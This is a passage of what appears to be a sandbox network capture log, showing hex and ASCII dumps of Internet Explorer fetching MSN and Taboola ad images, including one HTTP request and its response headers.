2021-12-02 23:42:43 UTC	44	IN	Data Raw: 98 b5 91 55 d7 b8 9e a7 2a e2 c5 4d b9 be 20 f5 98 34 de a3 7e 2a 65 ca 72 96 7e 37 a0 20 a8 5a 6a be 60 69 6c 0d a9 9f 56 b9 04 4f aa 0f 10 38 97 e0 42 c4 58 a1 1f 27 00 42 54 9d c4 50 08 a0 c2 62 00 20 f3 da 1b f3 db 98 77 10 83 be c2 11 7d b7 95 05 31 20 42 00 9a 54 f7 89 99 f1 6c 99 3f bc 45 cb ea 73 51 6e 79 bf 13 27 a0 d2 09 0c 6f cc c5 e9 f0 1a 56 ca 6e ac ef 33 61 5c 59 0a 87 05 3c cd 33 41 13 7e 9a 8c a5 3c cd 27 b3 4b 71 dc c2 49 e4 f4 a8 37 61 d5 c3 83 76 48 e9 a9 84 e7 88 bc 13 e4 c3 3b 18 4a ea 00 cf 42 eb f5 9e eb 51 1e d8 18 80 75 0a a8 89 8b 22 bb 1c 9c fc cc ff 00 44 30 d1 b8 51 44 f9 30 40 65 03 da 68 13 41 9a 25 54 b2 3b 4a 53 da 14 f0 66 93 d3 1e 50 45 1e 60 33 8e 63 a5 7d bd 7b 4e d7 18 d0 31 2f 58 26 1e 2f b8 9e 8d 0f a8 66 19 5d 99 Data Ascii: UM 4~er~7 Zj`ilVO8BX'BTPb w}1 BTl?EsQny'oVn3a\Y<3A~<'KqI7avH;JBQu"D0QD0@ehA%T;JSfPE`3c}{N1/X&/f]
2021-12-02 23:42:43 UTC	45	IN	Data Raw: 66 3f 93 f3 13 70 45 46 1b d1 9e 66 c4 08 99 0e a4 2c 49 0b da 2a ae 46 6d 23 bd f8 a8 71 7b 94 07 d7 e4 03 bc f9 59 80 df ee 25 d7 6d e1 77 22 8b 4d 2e 78 78 1d d7 91 15 81 a8 b1 b9 99 06 a5 30 8e c6 54 46 01 c9 27 89 d5 67 6c 6a 02 51 24 72 66 2e b7 20 cc b8 f2 69 2a de 47 13 af 61 88 63 60 08 37 43 7a b8 a8 7a f7 a5 01 5c 59 fb dc c7 83 fa 64 4c 64 d9 e4 c7 01 18 ac c7 f2 7e 62 ec b7 1c df de 5d 72 2e 7d a5 23 22 d5 2b 8d 8d 9a 87 1b a9 3e db fa 88 ae eb 4e 06 dc 5c c6 c9 ee 3f 0e dc ee 2f 78 e8 7d a7 4f 22 68 1e 41 3e 3b c1 8d 88 24 29 80 16 81 69 b6 16 7e 90 92 a9 70 35 f3 e9 99 34 9f 46 e3 8a fa 4c d8 f2 94 b5 24 af 75 98 ba 7c b9 b3 a7 b4 85 53 65 88 a9 fa 9f 4d 97 aa 7c 6f 85 4b 50 20 89 d0 74 2f d3 96 cb 90 8d 64 50 1e 27 51 f3 8f b4 74 04 80 71 Data Ascii: f?pEFf,IFm#q{Y%mw"M.xx0TF'gljQ$rf. iGac`7Czz\YdLd~b]r.}#"+>N\?/x}O"hA>;$)i~p54FL$u\|SeM\|oKP t/dP'Qtq
2021-12-02 23:42:43 UTC	46	IN	Data Raw: 3f fc 23 00 eb a4 9d aa 62 7f 80 e3 10 4f bc 46 2d 67 4d 4a 22 36 04 6d d7 63 1b 5e 2b d5 b1 1c 19 ac 66 c1 8f 29 5d e0 c9 8b 06 35 39 1c 2d ef bc c5 d4 60 cd b6 3c 81 8f 88 fd 7f 4c 8e 52 c9 23 c7 a6 ea 19 be 91 05 02 60 ee 66 5b 01 13 c0 b3 e8 08 16 44 3d ef f3 f5 9b ed fe 4f d7 88 4f 26 bb dc 00 5b 79 ba 11 28 e5 b3 74 3f 33 ea 27 8d a7 53 d6 3a 75 63 01 4b 5a 06 29 04 1d ce e6 ef fc 4b b1 f7 3c 7f 98 6b e8 7b 6f cf 89 bf 1f cc 5f 06 64 7c c8 e7 71 5d b6 e6 75 7d 6b 60 4c 41 51 4b b8 bd f8 00 44 fd 54 9c 6e b9 b1 8b 03 db a6 7f 5d 8d ed f3 74 fa dd b6 fa 05 fa 4e 94 0f 8c 1f 19 60 0d 8d f9 13 a8 e9 b3 e0 cb 44 73 08 99 8e c1 21 14 82 20 b6 51 f9 31 9b 53 31 86 01 b8 20 cd ae 81 84 79 d8 1e f0 d8 17 f4 d8 4d 34 02 83 b0 13 00 3a 09 3b 59 f4 26 a6 50 5c Data Ascii: ?#bOF-gMJ"6mc^+f)]59-`<LR#`f[D=OO&[y(t?3'S:ucKZ)K<k{o_d\|q]u}k`LAQKDTn]tN`Ds! Q1S1 yM4:;Y&P\
2021-12-02 23:42:43 UTC	48	IN	Data Raw: 67 fa 7e 5c 4e 0b 3a 95 1c 10 66 1c 8f fd 48 4a 22 a1 17 0d 59 51 b9 94 6b 79 52 bd 6a e6 f3 79 ee 96 3b 89 42 10 0a e9 61 62 64 c0 c9 ba db 2f 8e e2 74 ce 18 80 4f 1c 4c ea 35 83 e4 4e e3 ef 3b 1d e3 9f 67 de a3 bb e3 36 ad b1 f3 13 a8 56 f6 e4 00 7d 7b 4e b1 fa b1 d5 69 7c 96 a7 75 1d aa 67 c9 93 a7 c4 ad 8f 15 13 b3 4c 36 01 7c a3 db 56 47 89 87 af d1 9b 51 c5 4a e7 62 66 7e a1 15 50 9c a3 1a 93 57 fb 8f d8 4c 5f 04 a5 e1 20 ac a9 a6 64 ca 98 db 4b 30 bf 11 58 30 b1 b8 f4 af 4f c7 f7 3e 0b ff 00 75 2d 5c 1b db bc 2f f1 92 ea b2 26 e5 67 3a 48 8c 36 af 33 27 1f 91 18 8d d5 84 ee 44 f8 58 d9 ac a8 2d e7 bc 28 0a fe 7b cc 9a cf b7 12 ee dc c5 c5 95 82 07 01 98 4c f8 b2 b7 59 94 90 d5 ab bc fd 3d 48 0e 7b 4b de bd 33 ae 71 9d b5 5d 96 9d 2e 26 c7 8c 6a 37 Data Ascii: g~\N:fHJ"YQkyRjy;Babd/tOL5N;g6V}{Ni\|ugL6\|VGQJbf~PWL_ dK0X0O>u-\/&g:H63'DX-({LY=H{K3q].&j7
2021-12-02 23:42:43 UTC	49	IN	Data Raw: df 7b 2e 9e 52 5e 39 00 b6 03 d8 01 8d 2d 95 32 48 7b d0 ce 2c 72 16 ce 44 ef d3 e5 d8 ec 70 48 f7 6c 9c b3 53 85 84 aa a0 1e 01 b0 6f 3a bd 2d 5c 86 37 ec 4a b5 37 23 f9 c0 6c f6 fa e5 56 95 28 65 10 de 45 8c 53 6b d8 35 29 fe b6 30 52 a1 ab ae c4 f2 78 be 71 b8 78 ca 02 07 4d 8b 1e 0a 30 f3 ee 0e 45 a6 d4 eb 1a fa a4 17 dc c0 d9 52 c6 e9 4f c6 3b 44 f1 08 84 7d 31 a9 1a 86 1c 31 90 ee 4d bf e5 a3 78 ff 00 67 c1 18 50 8f 3c 6d d2 2c fe 91 40 01 fc 8c 58 a5 3e a3 d1 93 7a 05 3d e8 fb 30 e4 62 49 03 c4 01 15 d4 59 55 bc 1b e3 8c 6d d4 01 2d 23 bf a7 d8 6e 26 b1 f6 df ea 1c e0 ed 84 58 e4 67 73 9c 62 df 63 85 a2 fe a5 70 62 16 62 c5 4f ee 03 c8 c9 11 20 7d 82 15 34 59 b2 78 e6 89 77 52 b9 3b c0 f7 c4 91 19 43 12 54 36 c0 7e be 4e 49 26 9a 46 8e 3b b2 42 14 Data Ascii: {.R^9-2H{,rDpHlSo:-\7J7#lV(eESk5)0RxqxM0ERO;D}11MxgP<m,@X>z=0bIYUm-#n&XgsbcpbbO }4YxwR;CT6~NI&F;B
2021-12-02 23:42:43 UTC	50	IN	Data Raw: 1d 34 82 50 8a c1 04 56 9a 8a 6d cc 8e 1e 4f 43 7c 10 4d 00 73 50 77 46 fd 55 d8 cc 41 46 29 30 56 6d 9e 7d 4b de d8 9c 8d fd 0c de 86 52 0a a9 ee b4 4e e0 7c 65 1c 46 c6 4f 83 96 40 e0 a1 a3 8c d5 fb 64 17 8c ac 0d 6e 4e 41 c0 fe ea 7b f3 f0 71 ee 5d 3f 55 9f d3 b4 73 43 1a ff 00 c2 1b 93 9b 83 d9 4d dd c6 6b cc 68 cc f0 c1 0b 95 8d d8 8e ef 44 64 86 3e a0 48 e0 2d e0 e2 9e 9c 7b dd 1d 7b f3 5c 1c 8d 40 52 ce bf 2d d8 1f 90 3e fe f1 e5 bb 1a 03 dc 9c 24 d2 a4 d4 3b 3b 72 d8 21 65 66 7d 5a 03 60 24 7c e2 39 93 53 d2 d2 1d d6 4c 7a 6b 15 40 8a 05 b2 54 ea ec d3 f5 b7 b6 c4 67 02 23 b4 cb 74 03 8e 4e 10 4a 19 12 50 0a 93 2c 0d 52 ef 70 19 79 5a f1 ef 81 74 9c 05 95 19 62 81 22 98 ef 49 04 be ae 54 fa bc 72 46 49 1e ac 86 76 21 40 47 96 0b 59 50 4b 39 21 c3 Data Ascii: 4PVmOC\|MsPwFUAF)0Vm}KRN\|eFO@dnNA{q]?UsCMkhDd>H-{{\@R->$;;r!ef}Z`$\|9SLzk@Tg#tNJP,RpyZtb"ITrFIv!@GYPK9!
2021-12-02 23:42:43 UTC	52	IN	Data Raw: ef d4 00 4a b5 78 02 85 67 eb 24 43 18 75 67 2e 08 60 11 65 b4 2e 2d bc 8a be 31 dc 43 1a c6 90 5d 85 60 7a eb 4a f6 1a ee 89 53 59 d4 8c 21 8d 01 7e 76 7e 91 61 ac 0d ee c0 50 3d b2 66 60 bd 20 76 8a ea 45 60 b8 57 ef 7c b7 07 25 8c 87 a2 62 50 c5 94 85 95 c3 ab 1e 2c 95 5e f8 93 c2 db 61 99 74 ef d2 2b 02 02 ae d2 c8 ed bf f5 93 e0 0c d3 ff 00 d5 da 93 0e 8e 20 80 80 19 5f a0 b2 f2 17 c0 18 64 82 22 90 c6 ca 09 54 10 28 45 24 f7 24 85 c7 9f 59 ab d3 69 43 4e 8f 17 a3 56 20 b5 84 a1 fd 88 5f 24 ea c5 08 5e a8 d8 ec 75 96 42 4b 12 3a db 02 19 41 a6 cd 43 cd a8 92 52 f0 a1 3d 76 43 48 a6 52 e4 aa a6 d5 ec 1b 20 8e 47 62 f0 e9 90 5a 46 cc c5 9b a8 49 0c 7f 83 92 24 0a c9 a6 69 d7 d5 02 c2 e6 96 42 38 62 42 a1 26 c1 c0 92 96 2b bd d4 22 33 70 5b 65 12 28 13 Data Ascii: Jxg$Cug.`e.-1C]`zJSY!~v~aP=f` vE`W\|%bP,^at+ _d"T(E$$YiCNV _$^uBK:ACR=vCHR GbZFI$iB8bB&+"3p[e(
2021-12-02 23:42:43 UTC	53	IN	Data Raw: cd 8c 53 eb 90 24 32 47 b5 64 22 43 2a ed 07 b9 a3 c1 04 63 18 60 56 ee ec ed 19 6f 58 6b 3e b5 c4 de 1c c6 a1 cb 31 1b 87 aa 8f d4 e3 2c 65 1d 4b 22 f5 98 a4 7c 92 19 79 03 6f b7 63 89 29 40 9a 83 1a 73 e9 15 51 d7 1d 98 a8 ec 78 18 af 24 2a 74 e7 61 ea 17 68 ac 23 d0 3c 07 a3 ed 79 3f da 5a 5d 6c 5f 86 92 0d 33 20 0e 24 1f 9a e4 82 bb 16 db b9 cf b6 ff 00 e8 d4 ae 0a c7 a0 fb 41 04 fa 64 f6 58 ba df fd 8c 70 6a f5 7a c1 16 81 e7 7d c6 49 64 97 99 18 93 cf 2a 0a 8c 8d dc 74 e1 ea 46 53 6f e2 1c 81 c9 56 06 98 5f 03 8c 1b 03 2b 29 0c 3d 31 90 53 a7 51 83 64 00 0f 6e e0 e3 82 c5 62 59 36 89 03 6f e6 3a 41 b9 40 aa 04 b8 18 c2 19 0b c9 3b 44 4b c6 af 12 54 82 42 1b 68 76 1e aa 07 f7 56 26 a5 e2 d3 7e 46 8d d4 a4 d1 28 61 30 78 55 80 07 ea 33 d2 1d 81 51 63 Data Ascii: S$2Gd"Cc`VoXk>1,eK"\|yoc)@sQx$tah#<y?Z]l_3 $AdXpjz}Id*tFSoV_+)=1SQdnbY6o:A@;DKTBhvV&~F(a0xU3Qc
2021-12-02 23:42:43 UTC	54	IN	Data Raw: 31 1b 29 4d 38 2a 53 73 30 36 ec 36 d1 ef 60 d6 2b 02 61 8a 59 58 d1 da 1c 5a 42 a2 c1 1f fc 36 20 51 38 ce b2 b8 2c 14 6d 79 0c 81 42 6a 08 3b c2 ae de 24 5e 2b 1d 74 4f a9 96 e3 31 97 47 57 57 72 84 a9 a2 2c da e2 3c b1 cc a8 d0 c9 1a 32 37 4f d2 aa e8 6f 72 64 1a 48 7e cf d1 c8 bb 34 cf 21 88 cf 37 a1 69 1d df 68 db 9a 79 75 1f 6a a4 d1 01 34 a9 18 85 02 f2 ea d2 32 28 7f 0b 78 89 2e 9a 44 49 56 72 b1 48 85 c7 16 aa 5e c7 23 91 9b e3 74 57 57 50 6b 6b 92 01 ff 00 4c 26 fb 1c a5 41 6c 4f 60 2c 0c 32 a2 90 44 6f 65 2d 7b 1a 18 a8 d5 5e 87 65 ae 6f 8c d5 69 1f fc 2c 7a 89 89 b2 38 82 21 f1 c0 a1 9e a6 fd 72 8e 23 66 f2 08 c5 a5 51 c0 cd ee 5d 69 07 7c 95 98 8e 14 a1 07 3a 7b e7 55 08 3f 55 01 91 c7 27 7b 94 d4 64 f9 f5 7b e6 d0 ea 6c 9e 48 2d 8a e0 ae d7 Data Ascii: 1)M8*Ss066`+aYXZB6 Q8,myBj;$^+tO1GWWr,<27OordH~4!7ihyuj42(x.DIVrH^#tWWPkkL&AlO`,2Doe-{^eoi,z8!r#fQ]i\|:{U?U'{d{lH-
2021-12-02 23:42:43 UTC	56	IN	Data Raw: e9 55 89 21 90 92 08 f7 27 08 1e d8 22 43 c2 36 dd cc e4 03 d8 71 c5 f0 4e 37 54 f8 27 85 1e cb 8a ff 00 5f f9 e4 a5 07 1d 29 bf 39 3f 8d dc 8c 8d f8 e6 48 0e ef fd 2f 89 b8 ff 00 dd bb 04 90 11 fe 56 c9 12 ff 00 fe ed e9 c8 37 f8 49 05 a3 03 ef 60 90 72 3e a0 00 94 8d fd 3f 35 ba b3 4f 39 09 55 24 66 52 bf 46 5a 23 f8 c9 be ce 9f 7b 54 06 5f c4 45 ec 38 70 ae b9 a5 d5 28 b6 bd 3c a4 b0 74 f2 51 f6 f2 7b 1c 95 1f 59 f6 86 d8 8b 7a 26 89 21 1d d4 f8 36 d8 a6 16 f4 8d 52 f1 11 be c2 51 fb 1b e7 f4 9c 6a 3a 98 f9 3f b2 33 6f 5f 4b 18 c4 45 28 20 f8 01 c7 6f f4 ce e8 2b 8f 91 94 43 0c 1e 8e bd 7f a8 c3 be 0b 57 54 24 77 ec e3 e0 f9 c9 25 51 c1 51 c4 ab 7f 4e f8 b1 49 1a ec 9d c8 f5 ef 03 93 bb 0c 89 18 0d 10 1c 62 fe 23 a9 d2 12 01 41 b9 ac 76 9b 4b 18 25 11 Data Ascii: U!'"C6qN7T'_)9?H/V7I`r>?5O9U$fRFZ#{T_E8p(<tQ{Yz&!6RQj:?3o_KE( o+CWT$w%QQNIb#AvK%
2021-12-02 23:42:43 UTC	57	IN	Data Raw: c4 2e 41 0f f0 0f 83 8f 13 9e c1 85 5f d0 f9 fb 8d 0f 1f 71 47 da cb b8 77 a6 14 7e f4 1c d5 13 44 9c 50 7d ab 36 4e a0 2c 83 c3 7c e1 f4 48 e0 ff 00 34 72 f6 a1 da 0f 9c 02 48 64 01 8f ba 9f 18 76 b2 86 5c ee db cf fb 7d c0 13 17 e6 31 34 14 2f 9c 62 af c4 fa b9 2f 7b fc 28 f0 30 51 fb 3f 50 e0 f9 0c 88 57 fd 9b 07 08 a1 b8 ae 47 19 44 c4 68 fb 11 cd e0 2b ec 72 d1 85 a9 fb 98 30 ec 41 20 8c 69 a2 07 89 57 fb c4 ff 00 f2 c1 36 9a 54 0e 87 91 6a 7b 30 be 41 ce ac 00 59 27 86 51 f3 ef fd 8a 0e bb 97 e4 65 46 d2 6c 55 1d c8 1d ce 51 66 de 86 f9 14 39 cd cc 14 06 39 ff d9 Data Ascii: .A_qGw~DP}6N,\|H4rHdv\}14/b/{(0Q?PWGDh+r0A iW6Tj{0AY'QeFlUQf99

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.5	49835	151.101.1.44	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-02 23:42:43 UTC	16	OUT	GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fb9476698-227d-4478-b354-042472d9181c%2Fimages%2Fb21b558d-9496-4eb0-b10c-21d698be8cbf_1000x600.jpeg HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://www.msn.com/de-ch/?ocid=iehp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: img.img-taboola.com Connection: Keep-Alive
2021-12-02 23:42:43 UTC	57	IN	HTTP/1.1 200 OK Connection: close Content-Length: 13141 Server: nginx Content-Type: image/jpeg access-control-allow-headers: X-Requested-With access-control-allow-origin: * edge-cache-tag: 385445422443693362285531120715321563571,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70 etag: "dd7244b16d672b19f4a18deac0082d37" expiration: expiry-date="Fri, 17 Dec 2021 00:00:00 GMT", rule-id="delete fetch for taboola after 30 days" last-modified: Tue, 16 Nov 2021 18:41:47 GMT timing-allow-origin: * x-ratelimit-limit: 101 x-ratelimit-remaining: 100 x-ratelimit-reset: 1 x-envoy-upstream-service-time: 20 X-backend-name: CH_DIR:3FP7YNX3LMizprTZsG7BSW--F_CH_nlb804 Via: 1.1 varnish, 1.1 varnish Cache-Control: public, max-age=31536000 Accept-Ranges: bytes Date: Thu, 02 Dec 2021 23:42:43 GMT Age: 1078165 X-Served-By: cache-wdc5554-WDC, cache-dca12929-DCA, cache-mxp6939-MXP X-Cache: HIT, HIT, HIT X-Cache-Hits: 1, 1, 1 X-Timer: S1638488564.628416,VS0,VE1 Vary: ImageFormat X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fb9476698-227d-4478-b354-042472d9181c%2Fimages%2Fb21b558d-9496-4eb0-b10c-21d698be8cbf_1000x600.jpeg X-vcl-time-ms: 1
2021-12-02 23:42:43 UTC	59	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 06 06 06 06 07 06 07 08 08 07 0a 0b 0a 0b 0a 0f 0e 0c 0c 0e 0f 16 10 11 10 11 10 16 22 15 19 15 15 19 15 22 1e 24 1e 1c 1e 24 1e 36 2a 26 26 2a 36 3e 34 32 34 3e 4c 44 44 4c 5f 5a 5f 7c 7c a7 01 06 06 06 06 07 06 07 08 08 07 0a 0b 0a 0b 0a 0f 0e 0c 0c 0e 0f 16 10 11 10 11 10 16 22 15 19 15 15 19 15 22 1e 24 1e 1c 1e 24 1e 36 2a 26 26 2a 36 3e 34 32 34 3e 4c 44 44 4c 5f 5a 5f 7c 7c a7 ff c2 00 11 08 01 37 00 cf 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 00 03 00 03 01 01 01 00 00 00 00 00 00 00 00 00 04 05 06 02 03 07 00 01 08 01 00 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 02 03 04 01 05 00 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 e1 1a 45 ce 6a be 95 89 19 ec b1 19 86 10 Data Ascii: JFIF""$$6&&6>424>LDDL_Z_\|\|""$$6&&6>424>LDDL_Z_\|\|7"4Ej
2021-12-02 23:42:43 UTC	60	IN	Data Raw: d5 16 d0 3b c8 4b df 46 8b 36 81 bf 16 dd 35 5d c9 cf 04 30 94 be f3 9e d7 55 16 fd 5b 36 a5 c7 7c 1b 60 e8 a4 ae 71 84 3e 19 78 4f 0f b8 7b 7d 4d 82 87 ef 44 e6 2e 15 25 ed b2 52 d1 8b 99 4b d3 a6 73 64 68 40 07 c5 5f 18 65 63 53 cb 47 eb a8 b3 52 6d f7 b5 2d 0b f7 96 e2 35 7b c1 a3 9d ef 09 7b de f7 88 5f 7b d8 5b 0d f7 b7 2a 55 fb cf 9d 16 df 7a 7a d8 b5 f7 9a 85 68 3d ed f2 df 9e f2 5f bd ef bc c5 7f ff c4 00 2c 10 00 03 01 00 02 02 02 02 02 01 04 01 05 00 00 00 01 02 03 04 00 11 05 12 13 21 06 14 22 31 23 32 41 42 51 24 15 25 34 52 62 ff da 00 08 01 01 00 01 09 00 35 8a 3f 48 bf 3c d1 fb 11 4d 8e 2a bf c4 b9 5a fb 35 0e c3 39 14 20 6c 97 a8 59 52 0b a1 cf a0 23 2a 33 85 ab ab fd 42 70 58 66 bc 6b 19 9b 24 24 ec 50 06 86 7a ea 96 64 e3 ce 6f 5b e9 ac Data Ascii: ;KF65]0U[6\|`q>xO{}MD.%RKsdh@_ecSGRm-5{{_{[Uzzh=_,!"1#2ABQ$%4Rb5?H<MZ59 lYR#*3BpXfk$$Pzdo[
2021-12-02 23:42:43 UTC	61	IN	Data Raw: 55 b8 19 a9 a1 a8 a9 ae f4 d0 eb 14 64 27 c7 45 31 bf 3c 66 74 9a 46 63 92 4f 8e 2c c7 9e 77 4f cd a0 49 5a 39 c9 61 f5 82 00 28 05 6c c1 47 a8 e0 2c ed cc 68 de e0 83 05 13 99 a3 8d b5 2c ce c7 9a 5b e8 f7 c6 46 66 e6 3c 0c ec aa a9 ea 9e 3d 3d 27 cb 27 b7 f7 cb 63 0e 7f a8 78 e3 3b f6 46 6f 13 5b 7f a1 11 d6 8e 92 46 6f 47 0d 19 36 6c 71 c8 ac e4 bb 4f 24 ab a1 e7 24 7a b2 5c a2 a6 90 49 65 9e 9c fe 2f 3a ce 03 c4 78 eb db cb e6 be 97 f1 d2 03 d4 fa ee b7 c7 0f 51 c2 8d 5b b3 30 cd 95 8b 8e f9 04 f4 4f 6e 5e 9f 7f 5c 8f bf b0 e7 8c 8b 50 aa f5 a9 d4 20 50 75 bf 6c 7e ef db 73 3e 62 58 71 15 30 4c 0e 39 1f 67 b0 0b 1e 47 30 3f d8 a6 3c b9 84 ab a9 b5 f9 06 aa fa 29 cb 99 a4 d3 fd 79 32 a6 43 f1 0b 09 cd ec 45 c3 e4 a5 c1 be c3 28 be bd 06 71 4b 2c b3 9a Data Ascii: Ud'E1<ftFcO,wOIZ9a(lG,h,[Ff<==''cx;Fo[FoG6lqO$$z\Ie/:xQ[0On^\P Pul~s>bXq0L9gG0?<)y2CE(qK,
2021-12-02 23:42:43 UTC	63	IN	Data Raw: 0a b9 22 f9 bd 3a 68 ae 9d 03 1e 83 57 49 7e ac c1 9a 47 21 eb ab 36 65 54 92 0e bc 80 6f d9 47 1c cd ab f5 7c 99 b1 0b e8 2c 19 39 55 f6 82 3f 5a c1 ed 97 98 c9 17 20 f1 cf fe 1e 01 de e9 f6 84 f4 64 4e 95 e7 e3 f3 2b 65 e2 a7 ab 01 cf 8c 12 3b 19 48 12 7e b9 ab 47 43 9a 74 f6 48 ef 5d fb 24 71 e3 4a 1e 26 2f e4 3b e4 b1 a8 fa eb 1e 82 5a e3 3a 59 e7 15 f6 a6 84 b9 8c 52 70 49 4c a4 83 5a 9e 8d 18 a5 02 e2 53 e8 ab c4 72 48 21 b6 af d7 63 84 7f 2a 37 3c 06 85 d7 e2 73 30 71 f6 8b cd eb d3 f6 38 bf c3 53 71 1b ff 00 6e c2 79 a7 f9 a1 1d 34 d5 34 2f b9 f0 3d 7e c4 f8 bd 02 78 68 17 e8 f3 25 43 7c e3 9e 43 4f 5d fd d2 ec c7 a1 cf 89 89 fb e4 a4 a3 fd a7 2e fe fa 9c 47 d9 05 e5 76 fd ba 3b e6 19 bb 26 51 89 d1 42 7e 39 09 e7 cb 97 33 d7 8e b4 f4 0d 77 56 29 Data Ascii: ":hWI~G!6eToG\|,9U?Z dN+e;H~GCtH]$qJ&/;Z:YRpILZSrH!c*7<s0q8Sqny44/=~xh%C\|CO].Gv;&QB~93wV)
2021-12-02 23:42:43 UTC	64	IN	Data Raw: 1b 31 57 4e 67 64 ac 41 1c db 02 b5 23 a4 21 1d 91 f9 06 32 74 05 b6 66 17 90 a2 ae fc a5 28 dd 04 ad 33 d0 32 3f e2 9f 93 e6 f2 50 39 77 36 bc d7 cd 57 9d 02 d1 83 72 76 50 bc 96 af eb 82 93 da a1 58 e8 8b 2b 32 b2 bf f1 e0 d0 41 e4 37 52 6d da 3e 79 7d 17 76 f1 1f bc d5 04 8f 2b 1d 27 72 04 ae 45 48 52 8d c1 d8 9b 0a 1c 0e 17 c4 d9 c2 a9 f5 bd 00 e1 66 1e ae ad dc e7 aa 14 3c c3 ac cd bf 97 3c 94 05 16 76 5e 5e 7e e4 83 c8 02 c0 a7 30 d9 7d 4a 31 f2 79 0f 6d df 34 c3 d1 c8 61 9a c6 4c 17 bf c7 7f 25 3e 46 12 f1 9b cb 15 62 fe 8c 28 41 fb e0 d2 03 72 5a 97 fe e5 ae 1a a6 b2 d2 db 70 56 5d 76 29 9c 9e 05 f4 fa e5 f0 b6 6d 16 95 67 e1 8c eb ae a6 35 f2 94 35 f2 7b cc 08 ad 2b 25 37 3a 2d e9 31 2d 35 cd d8 f1 fb 03 b9 5f 5b b8 1c 79 99 bb 99 f2 34 57 85 23 Data Ascii: 1WNgdA#!2tf(32?P9w6WrvPX+2A7Rm>y}v+'rEHRf<<v^^~0}J1ym4aL%>Fb(ArZpV]v)mg55{+%7:-1-5_[y4W#
2021-12-02 23:42:43 UTC	65	IN	Data Raw: ca 71 0e 12 a2 7c a7 0c 99 c1 69 c4 f8 53 0b b9 d0 7a 98 8a b5 a0 00 46 6e 7b 72 76 5f f6 3b 73 0c 4b 12 29 30 41 18 6a 22 7e 0a e2 50 33 69 9f f4 0f 84 2f 72 04 e1 ab 01 41 9c 41 cd c8 bd b2 7e d2 d6 e5 59 50 25 47 9e a6 22 80 23 29 73 00 31 54 e4 45 03 31 be 69 59 3e e4 8e d3 85 6c b0 69 c7 6b 65 7f cb ed 29 fc 39 63 7c 76 fe 22 71 2e 79 0c a8 92 46 22 ab 11 a8 94 d0 10 73 11 ac 5c 45 80 46 f9 c4 43 89 c2 b6 18 89 c6 8f 89 51 fd df 63 28 6f 01 11 cf c7 b3 f8 8f bc b9 09 4c f4 13 87 e1 87 28 33 18 c6 23 d9 17 71 14 40 23 8c 30 9f 96 52 e7 21 bc f5 9c 48 0c b5 b7 66 1f 5d 20 05 08 32 c1 9b c1 5e aa 7e 92 ca 81 a1 87 70 67 0f 78 34 8f 48 6e cc 7b 94 1e 91 7c a0 82 5a 3a c4 d5 65 5a 5b cb fa a3 96 08 cb e5 a7 ac 0a b6 d6 19 7a 8c ce 25 1a b2 ad d8 c2 79 93 Data Ascii: q\|iSzFn{rv_;sK)0Aj"~P3i/rAA~YP%G"#)s1TE1iY>like)9c\|v"q.yF"s\EFCQc(oL(3#q@#0R!Hf] 2^~pgx4Hn{\|Z:eZ[z%y
2021-12-02 23:42:43 UTC	67	IN	Data Raw: 01 03 02 04 03 06 05 01 08 03 01 00 00 00 01 02 11 00 03 21 31 41 10 12 51 61 04 22 71 13 32 42 81 91 a1 20 23 62 b1 c1 52 14 33 53 72 82 b2 d1 e1 05 34 43 a2 ff da 00 08 01 01 00 0a 3f 00 a0 18 0d 4e 7f 7a 00 4f ce 96 7a 32 ca d2 0f 33 65 73 ad 33 93 ef c0 80 3e 74 00 2e 48 51 27 5d cd 2d c6 02 15 75 81 d8 2e 94 d7 2e bb e8 54 2a 60 91 03 a2 8d eb f3 23 99 d9 40 24 0f 53 a5 17 bd 7a 4a 80 4b 32 5b dd 89 ef 4a 85 cf 22 31 69 3d 0c 9d a6 90 a1 72 c1 3a 01 80 a3 9b 6a 00 9d 2d a8 c2 f6 a0 f7 c8 c2 e4 fc c8 14 16 f1 19 b8 c2 48 f4 1b 51 bc d1 f1 d5 b4 5d 80 00 0a 14 09 ee 2b 95 4e bc a7 94 fd a9 98 74 2c d4 00 f5 ae 58 ce 1a 68 fc e8 4f 49 a1 22 8e 0f 9a 8f 31 32 c7 61 d1 45 2f 29 a2 5a 61 14 77 a0 80 b6 80 fd e9 58 7b ad 75 8e 01 dd a8 03 ca ca 08 cb 0e ae Data Ascii: !1AQa"q2B #bR3Sr4C?NzOz23es3>t.HQ']-u..T*`#@$SzJK2[J"1i=r:j-HQ]+Nt,XhOI"12aE/)ZawX{u
2021-12-02 23:42:43 UTC	68	IN	Data Raw: 11 e2 58 f9 98 09 55 3d 14 54 f8 7b 65 62 5b cd 75 fa 05 14 48 3e e5 98 0b 8d 96 a7 91 65 ce 89 69 7b b6 d4 4d de 5e 45 81 1c a0 e2 0f 4f 4d 4d 28 3b dd 7d 7f e8 51 28 aa 4a b3 6a e4 9c b9 ac 29 35 bd 45 0f 91 ad 2b 03 87 99 f0 3b 28 ac d6 83 84 9f fe 6b d4 f5 f9 51 24 9e 20 de 89 54 d9 7b 9a f6 ac f7 61 cc e1 78 5d bf e3 1e 7d a1 b6 c1 99 67 e1 07 6a 5f 0f 92 63 9c 33 c0 ce b0 02 d2 db e4 c0 7e 59 1f e9 2d 92 7a b5 05 b7 84 0e 46 5f b5 b1 bf ae 94 b6 42 05 92 a6 20 8f 89 db 77 fd a9 d8 11 ef 10 43 37 a0 ae 4e 73 0c b6 c8 6b 81 46 c7 30 a4 d0 b5 61 6d 92 80 99 66 23 a9 e1 8e 19 14 78 1f 31 d6 